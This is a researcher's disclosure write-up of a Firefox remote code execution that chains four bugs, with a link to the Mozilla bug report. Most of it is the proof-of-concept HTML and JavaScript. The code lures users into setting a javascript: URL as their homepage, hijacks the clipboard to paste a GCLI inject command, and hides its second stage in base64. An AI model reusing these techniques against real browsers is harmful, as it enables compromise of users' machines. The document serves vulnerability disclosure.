FireFox RCE by chaining small bugs

The Main Bug

The main bug that made this possible was a strange behavior where 'javascript:' URLs coming from bookmarks were turning into chrome windows after a refresh occurs. This gave me my first chance at potentially injecting arbitrary chrome code, achieving that would mean I have an RCE!
After some time I was able to come up with a highly user-interactive proof of concept, best I could do given everything.

The following is the original PoC reported (note: localhost/q.js hosts the payload):

<!--
Content of the base64'd stuff:
-----------------------------------------------------------
<b>jQuery needs to be included first!<br>Hold down Shift+F2 and copy paste the below code into the input that appears and hit enter</b>
<br><br><br><input id="qc" style="width:300px;" value="inject 'http://jquery.cdn.mozilla.org'"/>


<script>
var pad=' '.repeat(1000);
var inj="inject 'http://jquery.cdn.mozilla.org"+pad+"@localhost/q.js'";

qc.oncopy=function(e){
e.clipboardData.setData('text/plain',inj)
e.preventDefault();
setTimeout("location.reload()",100)
}

qc.oncut=function(e){
e.clipboardData.setData('text/plain',inj)
e.preventDefault();
qc.value='';
setTimeout("location.reload()",100)
}
</script>

------------------------------------------------------------
 -->

<h3>A surprise is waiting for you...</h3>
<h2>Drag and drop the image below onto the small 'home' icon on the top right corner (choose yes). After that press the home button and further instructions will follow.</h2>
<img src="http://i.imgur.com/0PhK7.png" id="qimg"/>
<br><br><br>

<script>

qimg.ondragstart=function(ev){

ev.dataTransfer.clearData();
ev.dataTransfer.setData('text/plain',"http://aPageThatTellsYouToGoToOtherTab.ltd|javascript:atob('PGI+alF1ZXJ5IG5lZWRzIHRvIGJlIGluY2x1ZGVkIGZpcnN0ITxicj5Ib2xkIGRvd24gU2hpZnQrRjIgYW5kIGNvcHkgcGFzdGUgdGhlIGJlbG93IGNvZGUgaW50byB0aGUgaW5wdXQgdGhhdCBhcHBlYXJzIGFuZCBoaXQgZW50ZXI8L2I+Cjxicj48YnI+PGJyPjxpbnB1dCBpZD0icWMiIHN0eWxlPSJ3aWR0aDozMDBweDsiIHZhbHVlPSJpbmplY3QgJ2h0dHA6Ly9qcXVlcnkuY2RuLm1vemlsbGEub3JnJyIvPgoKCjxzY3JpcHQ+CnZhciBwYWQ9JyAnLnJlcGVhdCgxMDAwKTsKdmFyIGluaj0iaW5qZWN0ICdodHRwOi8vanF1ZXJ5LmNkbi5tb3ppbGxhLm9yZyIrcGFkKyJAbG9jYWxob3N0L3EuanMnIjsKCnFjLm9uY29weT1mdW5jdGlvbihlKXsKZS5jbGlwYm9hcmREYXRhLnNldERhdGEoJ3RleHQvcGxhaW4nLGluaikKZS5wcmV2ZW50RGVmYXVsdCgpOwpzZXRUaW1lb3V0KCJsb2NhdGlvbi5yZWxvYWQoKSIsMTAwKQp9CgpxYy5vbmN1dD1mdW5jdGlvbihlKXsKZS5jbGlwYm9hcmREYXRhLnNldERhdGEoJ3RleHQvcGxhaW4nLGluaikKZS5wcmV2ZW50RGVmYXVsdCgpOwpxYy52YWx1ZT0nJzsKc2V0VGltZW91dCgibG9jYXRpb24ucmVsb2FkKCkiLDEwMCkKfQo8L3NjcmlwdD4=')");

}
</script>

In total there are four different bugs in play:

The main bug where javascript urls turn to chrome window after refresh.
The ability to set a javascript url as homepage
Bypassing paste warning of WebConsole by using GCLI instead
Ability of GCLI to inject arbitrary code into chrome windows

References:

The report: https://bugzilla.mozilla.org/show_bug.cgi?id=1318911